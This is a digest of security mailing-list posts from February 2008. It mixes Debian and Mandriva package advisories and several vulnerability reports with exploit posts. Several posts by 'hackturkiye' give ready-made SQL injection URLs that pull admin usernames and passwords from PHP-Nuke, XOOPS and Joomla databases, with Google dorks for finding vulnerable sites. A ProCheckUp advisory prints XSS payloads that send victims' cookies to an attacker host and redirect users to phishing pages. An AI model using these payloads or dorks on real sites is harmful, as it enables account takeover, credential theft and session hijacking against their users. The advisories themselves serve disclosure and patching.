[SECURITY] [DSA 1499-1] New pcre3 packages fix arbitrary code execution

2008-02-19 Thread Florian Weimer
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1499-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Florian Weimer
February 19, 2008 http://www.debian.org/security/faq
- 

Package: pcre3
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)  : CVE-2008-0674

It was discovered that specially crafted regular expressions involving
codepoints greater than 255 could cause a buffer overflow in the PCRE
library (CVE-2008-0674).

For the stable distribution (etch), this problem has been fixed in
version 6.7+7.4-3.

For the old stable distribution (sarge), this problem has been fixed in
version 4.5+7.4-2.

For the unstable distribution, thi problem has been fixed in version
7.6-1.

We recommend that you upgrade your pcre3 package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

Source archives:

  http://security.debian.org/pool/updates/main/p/pcre3/pcre3_4.5+7.4-2.diff.gz
Size/MD5 checksum:99934 750cb82053d0d184e96b6f2256b07259
  http://security.debian.org/pool/updates/main/p/pcre3/pcre3_4.5+7.4-2.dsc
Size/MD5 checksum:  883 6d7166721448553dfe9672bdbb6c75c2
  http://security.debian.org/pool/updates/main/p/pcre3/pcre3_4.5+7.4.orig.tar.gz
Size/MD5 checksum:  1106897 de886b22cddc8eaf620a421d3041ee0b

Architecture independent packages:

  http://security.debian.org/pool/updates/main/p/pcre3/pgrep_4.5+7.4-2_all.deb
Size/MD5 checksum:  764 f45e8c3460a8e966a1de6dd1f8499beb

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-2_alpha.deb
Size/MD5 checksum:   191228 b56575e6599f47fceeffbec81ae4badd
  
http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-2_alpha.deb
Size/MD5 checksum:   218268 d4c05de57eafe479d07b84c99cd2
  
http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-2_alpha.deb
Size/MD5 checksum:21346 6cb3b9513b0acdc11b2b62524d0c996e

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-2_amd64.deb
Size/MD5 checksum:   181858 eaf65286f24f2eda0c5c2b0cf59d2e93
  
http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-2_amd64.deb
Size/MD5 checksum:19814 abef692f2c4fd08c8564986bef855f57
  
http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-2_amd64.deb
Size/MD5 checksum:   206374 23d917983de3d901cdbc021d707bb6fd

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-2_arm.deb
Size/MD5 checksum:   183712 6e6d063b597e869a4a214e5175cfc7b1
  
http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-2_arm.deb
Size/MD5 checksum:   209636 164c9c155f8c2704cebfd8798bd8d754
  
http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-2_arm.deb
Size/MD5 checksum:19398 d0a3bf731aa86aa6edd0288bf5f2a3d7

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-2_hppa.deb
Size/MD5 checksum:   208450 0b05321a818bfb34d17ff2baeaba6601
  
http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-2_hppa.deb
Size/MD5 checksum:21022 3ed44e57de9d68aeab7d4da4c40c2eac
  
http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-2_hppa.deb
Size/MD5 checksum:   190888 671eb5283ff2527047d4b180ad6aee67

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-2_i386.deb
Size/MD5 checksum:   184086 5ad41047b80b2b9846c395e6f452b497
  
http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-2_i386.deb
Size/MD5 checksum:19024 ae71a5aa7677abddc6fbb5f1d69315be
  
http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-2_i386.deb
Size/MD5 checksum:   206252 06a244ad5aed436a119db629b6f5a469

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-2_ia64.deb
Size/MD5 checksum:   228562 f1bc6cb07937b17adb7af5f9186cd7ed
  
http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-2_ia64.deb
Size/MD5 checksum:24750 c2340f5c62f546e6fa0bcdb2cbc9bd3e
  
http://security.debian.org/pool/updates/main/p/pcr

Access violation and limited informations disclosure in webcamXP 3.72.440.0

2008-02-19 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  webcamXP
  http://www.webcamxp.com
Versions: <= 3.72.440.0
  <= beta 4.05.280
Platforms:Windows
Bug:  access violation with limited informations disclosure
Exploitation: remote
Date: 18 Feb 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bug
3) The Code
4) Fix


###

===
1) Introduction
===


webcamXP is a commercial webcam software with an integrated webserver
for sharing the own videos.


###

==
2) Bug
==


The pocketpc and show_gallery_pic URI are used by the external users
for watching the images of the current webcams.
The problem is that there are no checks on the webcam's number passed
by the client allowing an attacker to go outside the array which
contains all the data about each webcam.

The main effect of this bug is the silent interruption of the service
due to the access violation caused by the reading of unallocated
memory and visible in the browser of the client who has performed the
malicious request.
For example /pocketpc allows to access the memory above and below
offset 007196f0 (the location of the array in version 3.72.440.0) with
steps of 6360 bytes for each webcam number.

The secondary effect is the possibility of reading 8 bytes of the
process's memory in a partial arbitrary way (the array's offset is
fixed but is only possible to jump 6360 bytes at time) since /pocketpc
displays these two 32 bit numbers in the "width" and "height"
parameters of the returned HTML page as visible in the assembly code
starting from offset 006BD46F.


###

===
3) The Code
===


http://SERVER:8080/pocketpc?camnum=99&mode=0
http://SERVER:8080/pocketpc?camnum=-99&mode=0
http://SERVER:8080/show_gallery_pic?id=99


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org


Two heap overflow in Foxit WAC Server 2.0 Build 3503

2008-02-19 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  Foxit Remote Access Server (WAC Server)
  http://www.foxitsoft.com/wac/server_intro.php
Versions: <= 2.0 Build 3503
Platforms:Windows
Bugs: A] telnet option heap overflow
  B] SSH packet heap overflow
Exploitation: remote
Date: 16 Feb 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


WAC is a commercial SSH/telnet server for Windows.


###

===
2) Bugs
===

--
A] telnet option heap overflow
--

The WAC server is vulnerable to a heap overflow exploitable through the
usage of options longer than 260 bytes.

Note: this bug was wrongly reported by me as a crash and with a wrong
server version one month ago.


---
B] SSH packet heap overflow
---

The server is affected also by another heap overflow exploitable
through big SSH packets, anyway no deeper research has been performed
on this vulnerability.


###

===
3) The Code
===


http://aluigi.org/poc/wachof.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org


Multiple buffer-overflow in NowSMS v2007.06.27

2008-02-19 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  Now SMS/MMS Gateway
  http://www.nowsms.com
Versions: <= v2007.06.27
Platforms:Windows
Bugs: A] web authorization buffer-overflow
  B] SMPP buffer-overflow
Exploitation: remote
Date: 19 Feb 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


NowSMS is a commercial SMS and MMS Content Delivery Solution.


###

===
2) Bugs
===


A] web authorization buffer-overflow


The web interface of NowSMS which listens on port 8800 allows the users
to use the gateway for sending various types of messages (EMS, binary,
WAP, MMS and so on).

The function which handles the base64 password located in the HTTP
Authorization parameter is affected by a stack based buffer-overflow
exploitable with more than 256 bytes.

The server can be exploited both in case it requires and doesn't
require authentication.


---
B] SMPP buffer-overflow
---

NowSMS uses a stack buffer of 4 kilobytes for containing the incoming
SMPP packets.
The lack of checks on the real size of these packets (max 0x
bytes) leads to a buffer-overflow vulnerability which can be exploited
by an attacker to execute malicious code remotely.

The SMPP server is not enabled by default and doesn't have a default
listening port (the admin must decide it).


###

===
3) The Code
===


http://aluigi.org/poc/nowsmsz.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org


NULL pointer crash in freeSSHd 1.20

2008-02-19 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  freeSSHd
  http://www.freesshd.com
  Note: is possible that the problem affects also
  wodSSHServer anyway this has not been tested
Versions: <= 1.2.0
Platforms:Windows
Bug:  NULL pointer crash
Exploitation: remote
Date: 17 Feb 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bug
3) The Code
4) Fix


###

===
1) Introduction
===


freeSSHd is a free SSH server for Windows.


###

==
2) Bug
==


The server can be crashed through a NULL pointer access simply sending
a SSH2_MSG_NEWKEYS packet as first command.


###

===
3) The Code
===


http://aluigi.org/poc/freesshdnull.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org


[ MDVSA-2007:047 ] - Updated Thunderbird packages fix multiple vulnerabilities

2008-02-19 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2007:047
 http://www.mandriva.com/security/
 ___
 
 Package : mozilla-thunderbird
 Date: February 19, 2008
 Affected: 2007.1, 2008.0
 ___
 
 Problem Description:
 
 A number of security vulnerabilities have been discovered and corrected
 in the latest Mozilla Thunderbird program, version 2.0.0.9.
 
 This update provides the latest Thunderbird to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3734
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3735
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3844
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3845
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5339
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5340
 http://www.mozilla.org/security/announce/2007/mfsa2007-18.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-26.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-27.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-29.html
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.1:
 b96d9da80acc0346a7c0f5bd11030d7f  
2007.1/i586/mozilla-thunderbird-2.0.0.9-6mdv2007.1.i586.rpm
 b0d3c696fe920e09d6256efbb3db25fa  
2007.1/i586/mozilla-thunderbird-be-2.0.0.9-1mdv2007.1.i586.rpm
 ab7eef3f6b8fdca732f779c7e2f0b322  
2007.1/i586/mozilla-thunderbird-bg-2.0.0.9-1mdv2007.1.i586.rpm
 f6fc86b8141369a3e290da2b01b47010  
2007.1/i586/mozilla-thunderbird-ca-2.0.0.9-1mdv2007.1.i586.rpm
 b496b6d9cf7246c27ff53df2912eb005  
2007.1/i586/mozilla-thunderbird-cs-2.0.0.9-1mdv2007.1.i586.rpm
 ffadbb5a5f02957ffdf69c224ded2b2b  
2007.1/i586/mozilla-thunderbird-da-2.0.0.9-1mdv2007.1.i586.rpm
 010ffcaf2e035107671316a7bd4e3b46  
2007.1/i586/mozilla-thunderbird-de-2.0.0.9-1mdv2007.1.i586.rpm
 a378cbb3ba9b698802a1fc752a11e385  
2007.1/i586/mozilla-thunderbird-devel-2.0.0.9-6mdv2007.1.i586.rpm
 1857892f2cfab96d63cc5fda072f0e81  
2007.1/i586/mozilla-thunderbird-el-2.0.0.9-1mdv2007.1.i586.rpm
 53f67a0c72556e0b827cb24ecc68120f  
2007.1/i586/mozilla-thunderbird-en_GB-2.0.0.9-1mdv2007.1.i586.rpm
 984ae64be68fef1879e04c29e266f1b5  
2007.1/i586/mozilla-thunderbird-enigmail-2.0.0.9-6mdv2007.1.i586.rpm
 be260fbf08a4be05c80f188ac751ffc0  
2007.1/i586/mozilla-thunderbird-enigmail-ca-2.0.0.9-2.1mdv2007.1.i586.rpm
 9c5fa8498bd524ccff51c14a3c8d1f42  
2007.1/i586/mozilla-thunderbird-enigmail-cs-2.0.0.9-2.1mdv2007.1.i586.rpm
 9d0be6fcb33730bf9d5e347442311a06  
2007.1/i586/mozilla-thunderbird-enigmail-de-2.0.0.9-2.1mdv2007.1.i586.rpm
 5e282858faf3da86cf78d03c93f69944  
2007.1/i586/mozilla-thunderbird-enigmail-el-2.0.0.9-2.1mdv2007.1.i586.rpm
 4c3cc6630884ae3ca447aaee74bc0555  
2007.1/i586/mozilla-thunderbird-enigmail-es-2.0.0.9-2.1mdv2007.1.i586.rpm
 e4192f82171cd8c7bd04206a101d7abe  
2007.1/i586/mozilla-thunderbird-enigmail-es_AR-2.0.0.9-2.1mdv2007.1.i586.rpm
 a8fe35494cf7d215c9ce5dab12107eac  
2007.1/i586/mozilla-thunderbird-enigmail-fi-2.0.0.9-2.1mdv2007.1.i586.rpm
 f9df5f2163da1e3732376b19e68a7af3  
2007.1/i586/mozilla-thunderbird-enigmail-fr-2.0.0.9-2.1mdv2007.1.i586.rpm
 e31dbf8e790ce386475baa4af85e99f2  
2007.1/i586/mozilla-thunderbird-enigmail-hu-2.0.0.9-2.1mdv2007.1.i586.rpm
 0601aef71690fb65f5c54d179f93ba4a  
2007.1/i586/mozilla-thunderbird-enigmail-it-2.0.0.9-2.1mdv2007.1.i586.rpm
 458e412c2a76d352e74a1283345f951c  
2007.1/i586/mozilla-thunderbird-enigmail-ja-2.0.0.9-2.1mdv2007.1.i586.rpm
 f19022391b980409dcf5c78889e20fb9  
2007.1/i586/mozilla-thunderbird-enigmail-ko-2.0.0.9-2.1mdv2007.1.i586.rpm
 05611c548151875834a26629cfad  
2007.1/i586/mozilla-thunderbird-enigmail-nb-2.0.0.9-2.1mdv2007.1.i586.rpm
 b045de8ff550e1b1486cd49f38c2f02a  
2007.1/i586/mozilla-thunderbird-enigmail-nl-2.0.0.9-2.1mdv2007.1.i586.rpm
 415fdc3c322eaa0be6cd9e44e54cb3b1  
2007.1/i586/mozilla-thunderbird-enigmail-pl-2.0.0.9-2.1mdv2007.1.i586.rpm
 f2447079be116f3d128690d371d87deb  
2007.1/i586/mozilla-thunderbird-enigmail-pt-2.0.0.9-2.1mdv2007.1.i586.rpm
 adda02c8e6cbae341880bdb275154db2  
2007.1/i586/mozilla-thunderbird-enigmail-pt_BR-2.0.0.9-2.1mdv2007.1.i586.rpm
 4049e9db5ace0730027d18a3fa014229  
2007.1/i586/mozilla-thunderbird-enigmail-ro-2.0.0.9-2.1mdv2007.1.i586.rpm
 df97b386da66168bf42b640fb0d84cf2  
2007.1/i586/mozilla-thunderbird-enigmail-ru-2.0.0.9-2.1mdv2007.1.i586.rpm
 e578119fa67a0cf13c36fac3066c36e8  
2007.1/i586/mozilla-thunderbird-enigmail-sk-2.0.0.9-2.1mdv2007.1.i586.rpm
 80434ce9a5c4699aa17ed49ce85be603  
2007.1/i586/mozilla-thunderbird-enigmail-sl-2.0.0.9-2.1mdv2007.1.i586.rpm
 6af367b09a2e7cdb0915b0ae4072acf3  
2007.1/i586/mozilla-t

PHP-Nuke Module Web_Links SQL Injection(cid)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   PHP-Nuke Module Web_Links SQL Injection(cid)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl:  file-index modules-php-op-modload-name-Web_Links "l_op 
viewlink"

# 

   DORK 2 : allinurl:  cid file-index modules-php-op-modload"l_op 
viewlink"name-Web_Links 




   example : 


http://XXX/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid= 
(exploit)


   EXPLOİT


modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=-0%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(aid,0x3a,pwd),char(111,112,101,114,110,97,108,101,51)/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201=%202





# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 







[SECURITY] [DSA 1498-1] New libimager-perl packages fix arbitrary code execution

2008-02-19 Thread Steve Kemp
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1498-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
February 19, 2008 http://www.debian.org/security/faq
- 

Package: libimager-perl
Vulnerability  : buffer overflow
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2007-2459
Debian Bug : 421582


It was discovered that libimager-perl, a Perl extension for Generating 24
bit images, did not correctly handle 8-bit per-pixel compressed images,
which could allow the execution of arbitrary code.

For the stable distribution, this problem has been fixed in version
0.50-1etch1.

We recommend that you upgrade your libimager-perl package.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

  
http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1.diff.gz
Size/MD5 checksum: 3049 e82e882633056ddef2beec5107085163
  
http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1.dsc
Size/MD5 checksum:  702 a2325e2e5fd0522924e1c394260fb902
  
http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50.orig.tar.gz
Size/MD5 checksum:   757843 19cfffe047909599226f76694155f996

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_alpha.deb
Size/MD5 checksum:   648188 54c4d2bfd5fc8db396cf8d9f30ee138e

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_amd64.deb
Size/MD5 checksum:   610124 06b382fe65e0ab39f66436c9a7574c9e

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_arm.deb
Size/MD5 checksum:   589256 185b679c399cbafeae33ceefe39e679c

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_hppa.deb
Size/MD5 checksum:   620720 445a0a72c32922d42e7c37afb8c5a361

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_i386.deb
Size/MD5 checksum:   605222 38189ae2167604712b8cb74dbefd5f7a

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_ia64.deb
Size/MD5 checksum:   751930 17f9e9c322ed61445eea4a7c38b2b0fc

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_mips.deb
Size/MD5 checksum:   557940 0e37144272d8f1aed97986e6af175870

mipsel architecture (MIPS (Little Endian))

  
http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_mipsel.deb
Size/MD5 checksum:   556756 b67b32674f7951f62496cce70e079f00

s390 architecture (IBM S/390)

  
http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_s390.deb
Size/MD5 checksum:   571872 2472728525f114e0faebc7832eeb66c4

sparc architecture (Sun SPARC/UltraSPARC)

  
http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_sparc.deb
Size/MD5 checksum:   607238 eab7744246cea808db37625cc46aac6f


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHuzlawM/Gs81MDZ0RAnmoAJ4uDJZ/IVXuS3B3+KIo+h22JfA6UwCaA2Nf
zc9AiJJUB/Y2QRhRrGyLzwQ=
=CIt+
-END PGP SIGNATURE-



XOOPS Module wflinks SQL Injection(cid)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#XOOPS Module wflinks SQL Injection(cid)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl: modules/wflinks/viewcat.php

# 

#  DORK 2 : allinurl: modules/wflinks

#





  example


  http://xx.com/modules/wflinks/viewcat.php?cid= [exploit]


  EXPLOIT : 


-88%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(117,115,101,114,110,97,109,101,58),concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%20pass%20





# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 






XOOPS Module eEmpregos SQL Injection(cid)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   XOOPS Module eEmpregos SQL Injection(cid)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl: "modules/eEmpregos/index.php"

# 

#  DORK 2 : allinurl:  cid "modules/eEmpregos"

#



   example


  http:///modules/eEmpregos/index.php?pa=view&cid=[exploit]



EXPLOIT : 


-%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+0,1,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*/*where%20admin%201=%202




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





XOOPS Module classifieds SQL Injection(cid)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   XOOPS Module classifieds SQL Injection(cid)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl: cid"modules/classifieds/index.php?pa=Adsview"

# 



   

  example


http:///modules/classifieds/index.php?pa=Adsview&cid=[exploit]


 EXPLOIT : 


-0%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0x3a,0x3a,concat(uname,0x3a,pass)/**/from+xoops_users/*where%20admin%20-1




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





Re: CSA-L03: Linux kernel vmsplice unchecked user-pointer dereference

2008-02-19 Thread si0uxsecurity
A basic malware to exploit this vulnerability:

http://si0ux.blogspot.com/2008/02/sara-malware.html




joomla SQL Injection(com_magazine)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_magazine)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_magazine"pageid=

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,111,222,333,444,555/**/from/**/jos_users/**




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





XOOPS Module seminars SQL Injection

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   XOOPS Module seminars SQL Injection

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"modules/seminars/index.php?op=show"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


modules/seminars/index.php?op=show&id=-7/**/union/**/select/**/0x3a,0x3a,0x3a,0x3a,uname,pass,0x3a,0x3a,0x3a/**/from/**/xoops_users/*where%20admin




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





XOOPS Module badliege SQL Injection

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   XOOPS Module badliege SQL Injection

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"modules/badliege/index.php?op=show"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


modules/badliege/index.php?op=show&id=-999/**/union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from+xoops_users/*where%20admin%20-5




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 




XOOPS Module events SQL Injection

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   XOOPS Module events SQL Injection

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"modules/events/index.php?op=show"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


modules/events/index.php?op=show&id=-+union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from/**/xoops_users/*where%20admin%20-111




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 




XOOPS Module vacatures SQL Injection

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   XOOPS Module vacatures SQL Injection

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"/modules/vacatures/index.php?pa=view"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


modules/vacatures/index.php?pa=view&cid=-0/**/union/**/select/**/,concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/**where%20admin%20-111




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





joomla SQL Injection(com_foevpartners)

2008-02-19 Thread hackturkiye . hackturkiye

###

# 

#   joomla SQL Injection(com_foevpartners)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_foevpartners"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_listoffreeads&AdId=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction portals

2008-02-19 Thread ProCheckUp Research

PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction portals


Description:

BEA Plumtree Foundation portal 6.0 and BEA AquaLogic Interaction 6.1 are 
vulnerable to a XSS vulnerability affecting the 'name' parameter which 
is submitted to the '/portal/server.pt' server-side script.


Date found: 12th September 2006

Vendor contacted: 18th May 2007

Successfully tested on: BEA Plumtree Foundation 6.0.1.218452.

BEA Systems have confirmed the following versions to be affected:

BEA Plumtree Foundation 6.0 through service pack 1.
BEA AquaLogic Interaction 6.1 through service pack 1.

BEA Plumtree 5.0J.173033, 5.02, 5.03 and 5.4 are not affected by this issue.


Severity: Medium-High


Authors: Jan Fry and Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)

ProCheckUp thanks BEA Systems for their co-operation.

Proof of concept:

The following requests launch a JavaScript alert box on the user's web 
browser, simply to prove that is possible to run scripting code on the 
victim's web browser.


Please note that '%22;}%3C/script%3E' is added at the beginning of every 
payload in order to make the overall HTML document syntactically 
correct, thus increasing the chance of the attack working on different 
web browser types:


https://target-domain.foo/portal/server.pt?open=space&name=alert('CanCrossSiteScript')
https://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ealert('CanCrossSiteScript')%3C/script%3E%3C!--


The following requests allow session hijacking through cookie theft:

https://target-domain.foo/portal/server.pt?open=space&name=window.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie%3C/script%3E%3C!--

The following requests allow password theft by redirecting to a 
third-party 'spoof' site which would perform a phishing attack on the 
victim:


https://target-domain.foo/portal/server.pt?open=space&name=window.location="http://phishers-site.foo";
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://phishers-site.foo%3C/script%3E%3C!--

HTML injection through this XSS vulnerability is also possible. This 
allows advanced phishing attacks by inserting a HTML form within the 
context of the victim website.



Consequences:

Scripting code can be run within the security context of the target 
site. User accounts can be hijacked. Advanced phishing attacks can be 
launched.



Note:

